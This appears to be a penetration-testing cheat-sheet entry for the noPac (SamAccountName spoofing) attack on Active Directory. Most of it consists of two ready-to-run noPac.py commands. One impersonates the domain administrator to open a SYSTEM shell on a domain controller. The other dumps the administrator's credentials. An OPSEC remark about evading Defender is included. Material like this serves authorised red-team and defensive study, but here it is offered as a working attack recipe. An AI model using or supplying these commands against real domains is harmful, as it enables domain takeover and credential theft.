NoPac (SamAccountName Spoofing)
https://github.com/Ridter/noPac.git
Identify
nxc:
Exploit
sudo python3 noPac.py DOMAIN.LOCAL/user:'pass' -dc-ip <dcip> -dc-host DC01 -shell --impersonate administrator -use-ldap
sudo python3 noPac.py DOMAIN.LOCAL/user:'pass' -dc-ip <dcip> -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN/administrator
OPSEC: will spawn a SYSTEM shell with smbsexec - shell may establish but defender will likely block further execution.